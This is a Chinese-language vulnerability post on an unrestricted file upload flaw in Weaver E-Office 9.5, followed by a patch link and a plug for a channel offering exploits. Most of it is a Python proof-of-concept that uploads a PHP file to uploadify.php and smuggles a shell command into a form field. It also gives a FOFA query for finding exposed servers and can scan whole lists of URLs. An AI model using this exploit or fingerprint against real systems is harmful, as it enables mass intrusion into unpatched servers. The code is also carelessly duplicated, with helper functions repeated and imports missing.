泛微 E-Office 代码问题漏洞
漏洞详情
Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。 Weaver E-Office 9.5版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传
影响版本
e-office 9.5
fofa
FOFA:app="泛微-EOffice"
POC:
def POC(url):
url1 = url+'/inc/jquery/uploadify/uploadify.php'
# 设置请求头
headers = {
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary1ZCUAAAXxnYuVIZR',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
# 设置表单数据
# data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5MVpDVUFBQVh4bll1VklaUg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJuYW1lIg0KDQoxJiZjYWxjJiZjb3B5IG51bCBhLmRvYw0KLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5MVpDVUFBQVh4bll1VklaUg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJGaWxlZGF0YSI7IGZpbGVuYW1lPSJ0ZXN0LnBocCINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vbXN3b3JkDQoNCjw/cGhwIHByaW50KDI1NioyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+DQotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnkxWkNVQUFBWHhuWXVWSVpSLS0'
proxies = {
"http": "http://127.0.0.1:8080",
"https": "https://127.0.0.1:8080"
}
data = '''------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="name"
1&&calc&© nul a.doc
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: application/msword
<?php print(256*256); unlink(__FILE__);?>
------WebKitFormBoundary1ZCUAAAXxnYuVIZR--
'''
try:
response = requests.post(url1, headers=headers, data=data, timeout=2)
match = re.search(r"\d{10}", response.text)
except Exception as e:
print (e)
print ("连接失败")
match = None
if match != None:
# print(response.text)
# print (response.text)
url2 = url + '/attachment/'+response.text+"/test.php"
print(url2)
try:
resp = requests.get(url2, timeout=5)
if resp.status_code == 200 and "65536" in resp.content:
print(url + "vulning!!!!!!!!!!!! ")
except Exception as e:
print ("连接失败")
else:
print("漏洞不存在")
#净化URL格式为http://xxx.xxx.xxx:xxx
def filter_url_path(url):
# 以两个斜杠//为位置分割URL
parts1 = url.split("//")
ip = parts1[1]
parts2 = ip.split("/")
if len(parts2)>0:
url = parts1[0]+"//"+parts2[0]
return url
else:
url = parts1+"//"+parts2
#文件读取URL
def process_file(file_path):
with open(file_path, "r") as file:
for line in file:
url = line.strip() # 去掉行尾的换行符
POC(url)
#净化URL格式为http://xxx.xxx.xxx:xxx
def filter_url_path(url):
# 以两个斜杠//为位置分割URL
parts1 = url.split("//")
ip = parts1[1]
parts2 = ip.split("/")
if len(parts2)>0:
url = parts1[0]+"//"+parts2[0]
return url
else:
url = parts1+"//"+parts2
#文件读取URL
def process_file(file_path):
with open(file_path, "r") as file:
for line in file:
url = line.strip() # 去掉行尾的换行符
POC(url)
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print("Please provide a URL or file path as an argument.")
else:
proxies = {
"http": "http://127.0.0.1:8080",
"https": "https://127.0.0.1:8080"
}
first_arg = args[0]
if first_arg.startswith("http"):
POC(first_arg)
else:
process_file(first_arg)
修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://service.e-office.cn/download
个人公众号及时更新最新漏洞POC,有需要的加关注
